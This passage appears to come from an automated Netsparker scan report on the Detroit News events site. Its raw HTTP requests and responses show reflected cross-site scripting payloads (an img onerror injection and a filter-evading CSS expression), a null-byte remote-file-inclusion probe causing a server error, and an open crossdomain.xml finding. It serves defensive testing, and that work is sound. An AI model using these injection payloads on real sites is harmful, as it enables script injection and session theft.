class="neighborhood_link">Neighborhood</a>, City & State, or ZIP</span></div><div class="search-control"><input id="z_search_button" name="commit" type="submit" value="Search" /><select id="st_select" name="st_select"><option value="any" selected="selected">All Listings</option><option value="event">Events</option><option value="movie">Movies</option><option value="venue">Venues</option><option value="restaurant">Restaurants</option></select></div><input type="hidden" name="search" value="true" /><input type="hidden" name="svt" value="text" /><input type="hidden" name="srss" value="50" /><div class="divclear"></div></form></div><div class="nav_bar"><div class="nav_bar_link"><a href="/welcome/create"><img alt="Ico_add" src="http://js.zvents.com/images/ico_add.gif?version=0.451530329483086" /> add to our listings</a></div><div class='nav_bar_tab nav_bar_on'><a href="/48067/events" name="&lid=Header_NavBar_'><iMg src=N onerror=netsparker(9)>&lpos='><iMg src=N onerror=netsparker(9)>_searches">events</a></div><div class='nav_bar_tab nav_bar_off'><a href="/48067/movies" name="&lid=Header_NavBar_'><iMg src=N onerror=netsparker(9)>&lpos='><iMg src=N onerror=netsparker(9)>_searches">movies</a></div><div class='nav_bar_tab nav_bar_off'><a href="/48067/venues" name="&lid=Header_NavBar_'><iMg src=N onerror=netsparker(9)>&lpos='><iMg src=N onerror=netsparker(9)>_searches">venues</a></div><div class='nav_bar_tab nav_bar_off'><a href="/48067/restaurants" name="&lid=Header_NavBar_'><iMg src=N onerror=netsparker(9)>&lpos='><iMg src=N onerror=netsparker(9)>_searches">restaurants</a></div><div class="divclear"></div></div></div><div class="login_tools z_login_tools"><a href="/">Home</a> |<a href="/user/signup?return_to=%2Fsearch%3Facat%3D3%26cat%3D3%26new%3Dn%26search%3Dtrue%26srad%3D40%26srss%3D50%26ssi%3D0%26ssrss%3D5%26st%3D%27%253E%253CiMg%2520src%3DN%2520onerror%3Dnetsparker%289%29%253E%26svt%3Dtext%26swhat%3Dfamily%26swhen%3D3%26trim%3D1%26sort%3D1">Register</a> | <a href="/user/login?return_to=%2Fsearch%3Facat%3D3%26cat%3D3%26new%3Dn%26search%3Dtrue%26srad%3D40%26srss%3D50%26ssi%3D0%26ssrss%3D5%26st%3D%27%253E%253CiMg%2520src%3DN%2520onerror%3Dnetsparker%289%29%253E%26svt%3Dtext%26swhat%3Dfamily%26swhen%3D3%26trim%3D1%26sort%3D1">Log In</a></div><div id="content"><script type="text/javascript"> Zvents.tracker.notifySearchView( '', '', 'st='><iMg src=N onerror=netsparker(9)>&what=family&when=3&ssi=0&ssrss=5&srss=51&cat=3');</script><div style="margin-top:3px;"><div id="navigation"><div id="facets"><div class="comp" id="refine_results"><div class="label">Refine Results</div><div class="content"><div class="facets"><div class="facet_title">No search results.</div></div></div></div></div><br /><div class="comp" id="partner_left_rail"><div class="label">Support</div>
<div class="content">
<ul class="ulindent">
<li><a href="/support/contact">Contact Us</a></li>
<li><a href="/support/help">Help / FAQ</a></li>
<li><a href="/support/content_guidelines">Content Guidelines</a></li>
</ul>
</div></div></div><div id="search_content_main"><div id="error_message">Invalid search: '><iMg src=N onerror=netsparker(9)> is not a valid search category.</div><div id="search_wrapper"><script type="text/javascript" charset="utf-8"> $ZJQuery(document).ready(function(){ $ZJQuery("#within_form").submit(function(){ parent.location = '/search?acat=3&cat=3&new=n&search=true&sort=1&srss=50&ssrss=5&st=%27%3E%3CiMg+src%3DN+onerror%3Dnetsparker%289%29%3E&svt=text&swhat=family&swhen=3&swhere=&trim=1' + '&srad=' + $ZJQuery('#srad2')[0].value; return false; }); $ZJQuery("#srad2").blur(function(){ parent.location = '/search?acat=3&cat=3&new=n&search=true&sort=1&srss=50&ssrss=5&st=%27%3E%3CiMg+src%3DN+onerror%3Dnetsparker%289%29%3E&svt=text&swhat=family&swhen=3&swhere=&trim=1' + '&srad=' + $ZJQuery('#srad2')[0].value; }); });</script><div class="resultinfo"> within<form name="within_form" id="within_form"><input type="text" name="srad2" id="srad2" value="40" size="3"></form> miles</div><div class="no_results"><h3 style="margin-top:0px">We don't have anything for "<span>family</span>" in our '&gt;&lt;iMg src=N onerror=netsparker(9)&gt; search.</h3><h3 class="sub_heading">Give it another go!</h3><p>Be as general as the "jazz" music you appreciate or as specific as that "USC / Cal Football" game for which you need tickets. Enter a search for what you want to do or simply what y..
Parameters
Parameter
|
Type
|
Value
|
cat
|
GET
|
1
|
st
|
GET
|
/" stYle="x:expre/**/ssion(alert(9))
|
Request
GET /search?cat=1&st=/%22%20stYle=%22x:expre/**/ssion(netsparker(9)) HTTP/1.1
Referer: http://events.detnews.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: events.detnews.com
Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlMzQ5NDlmNTRjNjQ1OGQ1NGRjYzc1OWZkMzQwYTI0N2YiDmxhc3Rfd2hhdCIsLycgc3RZbGU9J3ggZXhwcmUvICAvc3Npb24gbmV0c3BhcmtlciA5IghyaWRpACIJc2VpZGkIIgtidWNrZXRGIg5sYXN0X3doZW4iBjMiDWxhc3RfcnNzIgc1MCINbG9jYXRpb257ESILcmFkaXVzaS0iCWNpdHkiGFBvcnQgSHVyb24gVG93bnNoaXAiCmVycm9yRiINbGF0aXR1ZGVmEjQyLjk3NjYxNDIA55QiE2Rpc3BsYXlfc3RyaW5nIhxQb3J0IEh1cm9uIFRvd25zaGlwLCBNSSINdGltZXpvbmUiFEFtZXJpY2EvRGV0cm9pdCISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYbLTgyLjQ4NjEwNTMwMDAwMDAwNgB6YyIMYWRkcmVzcyIbcG9ydC1odXJvbi10b3duc2hpcC1taSIRd2hlcmVfc3RyaW5nQBkiCnN0YXRlIgdNSQ%3D%3D--820c7d21b97737320ea5b5be615e748addb268de; welcome=bfi54I2inY-9f2MM19CNcg.130339426; zvents_tracker_sid=bfi54I2inY-9f2MM19CNcg.130339426
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 14 Jan 2012 14:17:11 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 174.36.218.2
X-Runtime: 122
ETag: "a2c2af705c01ece6f0efa1d8d99be133"
Z-DETECTED-FLAVOR: events_flavor |
Z-REQUEST-HANDLED-BY: www6
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DToPc2Vzc2lvbl9pZCIlMzQ5NDlmNTRjNjQ1OGQ1NGRjYzc1OWZkMzQwYTI0N2YiCXNlaWRpCSIIcmlkaQAiDmxhc3Rfd2hhdCIAIg5sYXN0X3doZW4iACILYnVja2V0RiINbGFzdF9yc3MiBzUwIg1sb2NhdGlvbnsRIgljaXR5IhhQb3J0IEh1cm9uIFRvd25zaGlwIgtyYWRpdXNpLSINbGF0aXR1ZGVmEjQyLjk3NjYxNDIA55QiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhRBbWVyaWNhL0RldHJvaXQiE2Rpc3BsYXlfc3RyaW5nIhxQb3J0IEh1cm9uIFRvd25zaGlwLCBNSSIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstODIuNDg2MTA1MzAwMDAwMDA2AHpjIhF3aGVyZV9zdHJpbmdAHSIMYWRkcmVzcyIbcG9ydC1odXJvbi10b3duc2hpcC1taSIKc3RhdGUiB01J--0186cf190c1ec2c737ab4af8c71f0d8646f04369; path=/; expires=Sat, 14-Apr-2012 14:17:11 GMT; HttpOnly
Content-Encoding:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><meta name="y_key" content="9efebc8a7242cef1" /><meta name="ROBOTS" content="NOINDEX,FOLLOW" /><title>Search Results - Arts &amp; Crafts - Detroit News</title> <script type="text/javascript"> var zlogid = "qh61jPtYSb6RkN6ig5HDdw"; </script><script type="text/javascript" charset="utf-8"> var z_page_type = '/\" stYle=\"x:expre/**/ssion(netsparker(9))'; var z_temp_type = 'searches'; var z_user_location = '48067'; var z_disable_tracking = false; var z_include_quantcast = true;var z_cat = '1';var z_st = '/\" stYle=\"x:expre/**/ssion(netsparker(9))';var z_swhat = '';var z_swhen = '';var z_swhere = '';var z_srad = '40';var z_action = 'index';var z_cobrand = '#<Partner:0x2b88ea313410>';var z_controller = 'search';</script><meta name="keywords" content="Search results" /><meta name="description" content="Search results" /> <script src="http://js.zvents.com/javascripts/happy_default.js?version=0.153012922290923" type="text/javascript"></script><link href="http://js.zvents.com/stylesheets/happy_default.css?version=0.153012922290923" media="screen" rel="stylesheet" type="text/css" /><link href="http://js.zvents.com/stylesheets/happy_mv_views_pack.css?version=0.153012922290923" media="screen" rel="stylesheet" type="text/css" /><link href='/partners/css/26.css' media='screen' rel='Stylesheet' type='text/css' /><!--[if IE]><link href="http://js.zvents.com/stylesheets/happy_ie.css?version=0.153012922290923" media="screen" rel="stylesheet" type="text/css" /><![endif]--><!--[if IE 7]><link href="http://js.zvents.com/stylesheets/happy_ie7.css?version=0.153012922290923" media="screen" rel="stylesheet" type="text/css" /><![endif]--><!--[if lt IE 7]><link href="http://js.zvents.com/stylesheets/happy_ie6.css?version=0.153012922290923" media="screen" rel="stylesheet" type="text/css" /><![endif]--><link rel="search" href="/opensearch/description26.xml" type="application/opensearchdescription+xml" title="Detroit News Events" /></head><body id="body_/" stYle="x:expre/**/ssion(netsparker(9))"><div style="display:none"><iframe src="http://www.zvents.com/zat" width="1" height="1"><p>Your browser does not support iframes.</p></iframe></div><script type="text/javascript"> //<![CDATA[ Zvents.tracker.init( {"url":"http://www.zvents.com/zat","params":{"uid":"qh61jPtYSb6RkN6ig5HDdw","src":"zmp","pt":"search","pid":"26"}} ); //]]></script><div style='display:none'><!-- Segment Pixel - APP-AE7-ZEN - DO NOT MODIFY --><img src="https://secure.adnxs.com/seg?add=87103&t=2" width="1" height="1" /><!-- End of Segment Pixel --><!-- Segment Pixel for DET --><img src="https://secure.adnxs.com/seg?add=87286&t=2" width="1" height="1" /><!-- End of Segment Pixel --></div><script language="JavaScript" type="text/javascript"> function _hbLink(a,b) {}</script><script language="JavaScript" type="text/javascript"> var s_zv_account="zvprod"</script><!-- SiteCatalyst code version: H.20.3. Copyright 1997-2009 Omniture, Inc. More info available at http://www.omniture.com --><script language="JavaScript" type="text/javascript" src="/javascripts/s_code.js"></script><script language="JavaScript" type="text/javascript"><!--s_zv.prop4="40"s_zv.prop5="1"s_zv.prop48="art_DET"s_zv.prop6="/\" stYle=\"x:expre/**/ssion(netsparker(9))"s_zv.prop49="art_ZEN"s_zv.prop7="0"s_zv.prop8="new"s_zv.prop1=""s_zv.prop10="Port Huron Township, MI"s_zv.prop2=""s_zv.prop3="" s_zv.pageName="/\" stYle=\"x:expre/**/ssion(netsparker(9)):searches:text" s_zv.channel="/\" stYle=\"x" s_zv.hier1="/\" stYle=\"x,expre/**/ssion(netsparker(9)),searches" s_zv.prop12="expre/**/ssion(netsparker(9)) searches" s_zv.prop25="/search?cat=1&st=/%22%20stYle=%22x:expre/**/ssion(netsparker(9))" s_zv.prop29="events.detnews.com" s_zv.prop30="Detroit News" s_zv.prop31="Detroit Media Partnership" s_zv.prop32="26" s_zv.prop28="Detroit Media Partnership:Detroit News:events.detnews.com:26" s_zv.prop41="not logged in" s_zv.prop42="Detroit News|/\" stYle=\"x:expre/**/ssion(netsparker(9)):searches:text" s_zv.server="www6.admin.zvents.com:classic" s_zv.linkInternalFilters="javascript:,events.detnews.com" s_zv.events=s_zv.apl(s_zv.events,"event1",",",2); /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_zv.t();if(s_code)document.write(s_code)//--></script><script language="JavaScript" type="text/javascript"><!-- if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-') //--></script><noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://metrics.zvents.com/b/ss/zv_prod/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /></a></noscript><!--/DO NOT REMOVE/--><!-- End SiteCatalyst code version: H.20.3. --><script language="JavaScript" type="text/javascript"> (function($){ $(function(){ $('.sc-event-buytixbig').click(function(){ s_zv.tl(this, 'o', 'EventDetail_BuyTix_GreenButton'); return true; }); $('.sc-event-buytixico').click(function(){ s_zv.tl(this, 'o', 'EventDetail_Recurring_BuyNowIco'); return true; }); $('.sc-venue-reservation').click(function(){ s_zv.tl(this, 'o', 'MakeReservation_GreenButton'); return true; }); $('.sc-serp-reservation').click(function(){ s_zv.tl(this, 'o', 'SERP_HotDining_BuyNow'); return true; }); $('.sc-reminder').click(function(){ this.name = "lid=Reminder_icon&lpos="+s_zv.pageName; s_zv.tl(this, 'o', 'Reminder_icon'); return true; }); }); })($ZJQuery);</script><div id="wrapper"><link href="http://detroitnews.com/includes/css/ody/ody-vendor.min.css" rel="stylesheet" type="text/css">
<link href="http://detroitnews.com/includes/css/ody/ody-local.css" rel="stylesheet" type="text/css">
<link rel="stylesheet" type="text/css" href="http://detroitnews.com/odygci/p4/ody-styles-min.css"/>
<!-- Load jQuery from Google CDN with local fallback -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script>
<script>window.jQuery || document.write('<script src="js/libs/jquery-1.6.2.min.js"><\/script>')</script>
<!-- Load jQueryUI from Google CDN -->
<script src="//ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.js"></script>
<script src="http://detroitnews.com/includes/js/detnews-1.0.js"></script>
<script src="http://detroitnews.com/odygel/lib/core/core.js"></script>
!-- Start OAS Ad Code -->
<script type="text/javascript" language="JavaScript">
listpos_IN = "728x90_1,728x90_2,Flex_1,Flex_2,300x250_1,300x250_2,160x600_1,88x31_1,PageCount";
sitepage_IN = " mi-zvents.detnews/events/detail";
</script>
<script type="text/javascript" src="http://www.detnews.com/portables/OAS_functions.js"></script>
<!-- End OAS Ad Code -->
<script type="text/javascript">
var omitHeaderLeaderboardAd_IN = "false";
var omitMicroBarAd_IN = "true";
var omitFooterLeaderboardAd_IN = "false";
var configureHeaderClass_IN = "inside";
var configureFrontHeader_IN = "true";
var configureInsideHeader_IN = "false";
var configureSectionName_IN = "Events Calendar";
var configureSectionLink_IN = "\'http:\/\/apps.detnews.com\/apps\/multimedia\/index.php'";
var configureChildSectionName_IN = "";
var configureChildSectionLink_IN = "\'http:\/\/apps.detnews.com\/apps\/multimedia\/index.php'";
</script>
</head>
<body class="ody-skin">
<div class="ody-custom interactive">
<div class="ody-custom-wrapper">
<script type="text/javascript" src="http://detroitnews.com/portables/header.js"></script>
<div class="ody-wrapper grid_18">
<div class="content-container">
<div class="container">
<div class="ody-article article">
<div class="interactive"><script type="text/javascript" charset="utf-8"> $ZJQuery(document).ready(function(){ $ZJQuery("#swhat").hint('blur',false); $ZJQuery("#swhen").hint('blur',false); $ZJQuery("#main_neighborhood_link").zModal({load: "/welcome/populate_neighborhoods/", showCloseIcon: true, remote: true, modalHeight: 400}); $ZJQuery(".nav_bar_tab").divlink(); });</script><div id='z_search_and_browse'><div id='z_search_bar'><form action="/search" method="get"><div class="search-control"><label>what</label> <input id="swhat" name="swhat" type="text" value="" /></div><div class="search-control"><label>when</label> <input id="swhen" name="swhen" type="text" value="" /></div><div class="search-control"><label>near</label> <input id="swhere" name="swhere" type="text" value="Port Huron Township, MI" /><br /><span id="near_help">Address, <a href="javascript:void(0)" id="main_neighborhood_link" class="neighborhood_link">Neighborhood</a>, City & State, or ZIP</span></div><div class="search-control"><input id="z_search_button" name="commit" type="submit" value="Search" /><select id="st_select" name="st_select"><option value="any" selected="selected">All Listings</option><option value="event">Events</option><option value="movie">Movies</option><option value="venue">Venues</option><option value="restaurant">Restaurants</option></select></div><input type="hidden" name="search" value="true" /><input type="hidden" name="svt" value="text" /><input type="hidden" name="srss" value="50" /><div class="divclear"></div></form></div><div class="nav_bar"><div class="nav_bar_link"><a href="/welcome/create"><img alt="Ico_add" src="http://js.zvents.com/images/ico_add.gif?version=0.153012922290923" /> add to our listings</a></div><div class='nav_bar_tab nav_bar_on'><a href="/48067/events" name="&lid=Header_NavBar_/" stYle="x:expre/**/ssion(netsparker(9))&lpos=/" stYle="x:expre/**/ssion(netsparker(9))_searches">events</a></div><div class='nav_bar_tab nav_bar_off'><a href="/48067/movies" name="&lid=Header_NavBar_/" stYle="x:expre/**/ssion(netsparker(9))&lpos=/" stYle="x:expre/**/ssion(netsparker(9))_searches">movies</a></div><div class='nav_bar_tab nav_bar_off'><a href="/48067/venues" name="&lid=Header_NavBar_/" stYle="x:expre/**/ssion(netsparker(9))&lpos=/" stYle="x:expre/**/ssion(netsparker(9))_searches">venues</a></div><div class='nav_bar_tab nav_bar_off'><a href="/48067/restaurants" name="&lid=Header_NavBar_/" stYle="x:expre/**/ssion(netsparker(9))&lpos=/" stYle="x:expre/**/ssion(netsparker(9))_searches">restaurants</a></div><div class="divclear"></div></div></div><div class="login_tools z_login_tools"><a href="/">Home</a> |<a href="/user/signup?return_to=%2Fsearch%3Fcat%3D1%26st%3D%2F%2522%2520stYle%3D%2522x%3Aexpre%2F%2A%2A%2Fssion%28netsparker%289%29%29">Register</a> | <a href="/user/login?return_to=%2Fsearch%3Fcat%3D1%26st%3D%2F%2522%2520stYle%3D%2522x%3Aexpre%2F%2A%2A%2Fssion%28netsparker%289%29%29">Log In</a></div><div id="content"><script type="text/javascript"> Zvents.tracker.notifySearchView( '', '', 'st=/" stYle="x:expre/**/ssion(netsparker(9))&ssi=0&ssrss=5&srss=11&cat=1');</script><div style="margin-top:3px;"><div id="navigation"><div id="facets"><div class="comp" id="refine_results"><div class="label">Refine Results</div><div class="content"><div class="facets"><div class="facet_title">No search results.</div></div></div></div></div><br /><div class="comp" id="partner_left_rail"><div class="label">Support</div>
<div class="content">
<ul class="ulindent">
<li><a href="/support/contact">Contact Us</a></li>
<li><a href="/support/help">Help / FAQ</a></li>
<li><a href="/support/content_guidelines">Content Guidelines</a></li>
</ul>
</div></div></div><div id="search_content_main"><div id="error_message">Invalid search: /" stYle="x:expre/**/ssion(netsparker(9)) is not a valid search category.</div><div id="search_wrapper"><script type="text/javascript" charset="utf-8"> $ZJQuery(document).ready(function(){ $ZJQuery("#within_form").submit(function(){ parent.location = '/search?cat=1&st=%2F%22+stYle%3D%22x%3Aexpre%2F%2A%2A%2Fssion%28netsparker%289%29%29&swhat=&swhen=&swhere=' + '&srad=' + $ZJQuery('#srad2')[0].value; return false; }); $ZJQuery("#srad2").blur(function(){ parent.location = '/search?cat=1&st=%2F%22+stYle%3D%22x%3Aexpre%2F%2A%2A%2Fssion%28netsparker%289%29%29&swhat=&swhen=&swhere=' + '&srad=' + $ZJQuery('#srad2')[0].value; }); });</script><div class="resultinfo"> within<form name="within_form" id="within_form"><input type="text" name="srad2" id="srad2" value="40" size="3"></form> miles</div><div class="no_results"><h3 style="margin-top:0px">We don't have anything for "<span></span>" in our /&quot; stYle=&quot;x:expre/**/ssion(netsparker(9)) search.</h3><h3 class="sub_heading">Give it another go!</h3><p>Be as general as the "jazz" music you appreciate or as specific as that "USC / Cal Football" game for which you need tickets. Enter a search for what you want to do or simply what you enjoy. </p><h3 class="sub_heading">Expand Your Search</h3><a href="/search?cat=1&new=n&srad=40&st=any&swhat=&swhen=&swhere=">Search for "" in all products</a><div class="products">(Events, Movies, Venues, Restaurants, and Performers)</div><h3 class="sub_heading">Search Tips</h3><p>To learn how to get better results from your searches, read our <a href='/welcome/search_tips'>Search Tips</a>.</p><h3 class="sub_heading">Subscribe To This Search</h3><p>New listings are created all the time, which means that there's a good chance that there will be matches for this search in the futur..
Open Policy Crossdomain.xml Identified
Open Policy Crossdomain.xml Identified
Netsparker identified Open Policy Crossdomain.xml file.
Impact
Open Policy Crossdomain.xml file allows other SWF files to make HTTP requests to your web server and see its response. This can be used for accessing one time tokens and CSRF nonces to bypass CSRF restrictions.
Configure your Crossdomain.xml to prevent access from everywhere to your domain.
External References
Classification
- <allow-access-from domain="*" />
Request
GET /crossdomain.xml HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: events.detnews.com
Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNWU3OTlhMzNiMGNmYWQ0MTJhNjhiZTVkN2I2Njg2OTciDWxvY2F0aW9uexEiCWNpdHkiH1JveWFsIE9hayBDaGFydGVyIFRvd25zaGlwIgtyYWRpdXNpUCINbGF0aXR1ZGVmGjQyLjQ5MjI5NDYwMDAwMDAwMQB%2FqyIKZXJyb3JGIhJkaXN0YW5jZV91bml0IgptaWxlcyINdGltZXpvbmUiFEFtZXJpY2EvRGV0cm9pdCITZGlzcGxheV9zdHJpbmciI1JveWFsIE9hayBDaGFydGVyIFRvd25zaGlwLCBNSSIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstODMuMTMyNzMzMjAwMDAwMDA0AEX7IhF3aGVyZV9zdHJpbmdAFCIMYWRkcmVzcyIKNDgwNjciCnN0YXRlIgdNSQ%3D%3D--5909e1b9db34e112c181afa413cb1e0a0f4fc510; welcome=e6WjvB-0eLxOLXKsdXGTEw.130338079; zvents_tracker_sid=e6WjvB-0eLxOLXKsdXGTEw.130338079
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 14 Jan 2012 13:51:37 GMT
Content-Type: text/xml
Last-Modified: Thu, 26 May 2011 23:14:54 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Sun, 15 Jan 2012 13:51:37 GMT
Cache-Control: max-age=86400
Content-Encoding:
<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="*" /></cross-domain-policy>
Internal Server Error
Internal Server Error
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.
Impact
The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.
Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
Parameters
Parameter
|
Type
|
Value
|
has_editors_pick
|
GET
|
1
|
new
|
GET
|
n
|
srad
|
GET
|
40
|
swhat
|
GET
|
3
|
swhen
|
GET
|
http://netsparker.com/n? .php
|
Request
GET /search?has_editors_pick=1&new=n&srad=40&swhat=3&swhen=http://netsparker.com/n?%00.php HTTP/1.1
Referer: http://events.detnews.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: events.detnews.com
Cookie: _zsess=BAh7DDoPc2Vzc2lvbl9pZCIlNWU3OTlhMzNiMGNmYWQ0MTJhNjhiZTVkN2I2Njg2OTciCHJpZGkYIg5sYXN0X3doYXQiECcgT1IgJzEnPScxIg5sYXN0X3doZW4iEE5leHQgNyBEYXlzIgtidWNrZXRGIg1sYXN0X3JzcyIHNTAiDWxvY2F0aW9uexEiC3JhZGl1c2lQIgljaXR5Ih9Sb3lhbCBPYWsgQ2hhcnRlciBUb3duc2hpcCIKZXJyb3JGIg1sYXRpdHVkZWYaNDIuNDkyMjk0NjAwMDAwMDAxAH%2BrIhNkaXNwbGF5X3N0cmluZyIjUm95YWwgT2FrIENoYXJ0ZXIgVG93bnNoaXAsIE1JIg10aW1lem9uZSIUQW1lcmljYS9EZXRyb2l0IhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstODMuMTMyNzMzMjAwMDAwMDA0AEX7IgxhZGRyZXNzIgo0ODA2NyIRd2hlcmVfc3RyaW5nQBgiCnN0YXRlIgdNSQ%3D%3D--08e9e0b2dc71467006713c0dad0bddfa9f5ced06; welcome=vzxC8TsWPUPsWdkcgntN-Q.130338090; zvents_tracker_sid=vzxC8TsWPUPsWdkcgntN-Q.130338090
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Internal Server Error
Server: nginx/0.6.39
Date: Sat, 14 Jan 2012 13:52:27 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 500 Internal Server Error
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 174.36.218.2
Z-DETECTED-FLAVOR: events_flavor |
Z-REQUEST-HANDLED-BY: www21
Cache-Control: no-cache, private
Set-Cookie: _zsess=BAh7DDoPc2Vzc2lvbl9pZCIlNWU3OTlhMzNiMGNmYWQ0MTJhNjhiZTVkN2I2Njg2OTciDmxhc3Rfd2hhdCIGMyIIcmlkaRkiC2J1Y2tldEYiDmxhc3Rfd2hlbiIiaHR0cDovL25ldHNwYXJrZXIuY29tL24%2FAC5waHAiDWxhc3RfcnNzIgc1MCINbG9jYXRpb257ESIJY2l0eSIfUm95YWwgT2FrIENoYXJ0ZXIgVG93bnNoaXAiC3JhZGl1c2lQIg1sYXRpdHVkZWYaNDIuNDkyMjk0NjAwMDAwMDAxAH%2BrIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIg10aW1lem9uZSIUQW1lcmljYS9EZXRyb2l0IhNkaXNwbGF5X3N0cmluZyIjUm95YWwgT2FrIENoYXJ0ZXIgVG93bnNoaXAsIE1JIgxjb3VudHJ5IhJVbml0ZWQgU3RhdGVzIg5sb25naXR1ZGVmGy04My4xMzI3MzMyMDAwMDAwMDQARfsiEXdoZXJlX3N0cmluZ0AcIgxhZGRyZXNzIgo0ODA2NyIKc3RhdGUiB01J--94426f4eb621b496a687bcddaea3d6de896cbd56; path=/; expires=Sat, 14-Apr-2012 13:52:27 GMT; HttpOnly
Content-Encoding:
Transfer-Encoding: chunked
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><meta name="y_key" content="9efebc8a7242cef1" /><meta name="ROBOTS" content="NOINDEX,FOLLOW" /><title>Error - Detroit News</title> <script type="text/javascript"> var zlogid = "I66CZzLuiXb5sjHxtNexaQ"; </script><script type="text/javascript" charset="utf-8"> var z_page_type = ''; var z_temp_type = ''; var z_user_location = '48067'; var z_disable_tracking = false; var z_include_quantcast = true;var z_new = 'n';var z_swhat = '3';var z_has_editors_pick = '1';var z_srad = '40';var z_swhen = 'http://netsparker.com/n? .php';var z_swhere = '';var z_action = 'index';var z_controller = 'search';</script><meta name="keywords" content="Search results" /><meta name="description" content="Search results" /> <script src="http://js.zvents.com/javascripts/happy_default.js?version=0.606147970006598" type="text/javascript"></script><link href="http://js.zvents.com/stylesheets/happy_default.css?version=0.606147970006598" media="screen" rel="stylesheet" type="text/css" /><link href="http://js.zvents.com/stylesheets/happy_mv_views_pack.css?version=0.606147970006598" media="screen" rel="stylesheet" type="text/css" /><link href="http://js.zvents.com/stylesheets/happy_mv_views_pack.css?version=0.606147970006598" media="screen" rel="stylesheet" type="text/css" /><link href='/partners/css/26.css' media='screen' rel='Stylesheet' type='text/css' /><!--[if IE]><link href="http://js.zvents.com/stylesheets/happy_ie.css?version=0.606147970006598" media="screen" rel="stylesheet" type="text/css" /><![endif]--><!--[if IE 7]><link href="http://js.zvents.com/stylesheets/happy_ie7.css?version=0.606147970006598" media="screen" rel="stylesheet" type="text/css" /><![endif]--><!--[if lt IE 7]><link href="http://js.zvents.com/stylesheets/happy_ie6.css?version=0.606147970006598" media="screen" rel="stylesheet" type="text/css" /><![endif]--><link rel="search" href="/opensearch/description26.xml" type="application/opensearchdescription+xml" title="Detroit News Events" /></head><body id="body_"><div style="display:none"><iframe src="http://www.zvents.com/zat" width="1" height="1"><p>Your browser does not support iframes.</p></iframe></div><script type="text/javascript"> //<![CDATA[ Zvents.tracker.init( {"url":"http://www.zvents.com/zat","params":{"uid":"I66CZzLuiXb5sjHxtNexaQ","src":"zmp","pt":"search","pid":"26"}} ); //]]></script><div style='display:none'><!-- Segment Pixel - APP-AE7-ZEN - DO NOT MODIFY --><img src="https://secure.adnxs.com/seg?add=87103&t=2" width="1" height="1" /><!-- End of Segment Pixel --><!-- Segment Pixel for DET --><img src="https://secure.adnxs.com/seg?add=87286&t=2" width="1" height="1" /><!-- End of Segment Pixel --></div><script language="JavaScript" type="text/javascript"> function _hbLink(a,b) {}</script><script language="JavaScript" type="text/javascript"> var s_zv_account="zvprod"</script><!-- SiteCatalyst code version: H.20.3. Copyright 1997-2009 Omniture, Inc. More info available at http://www.omniture.com --><script language="JavaScript" 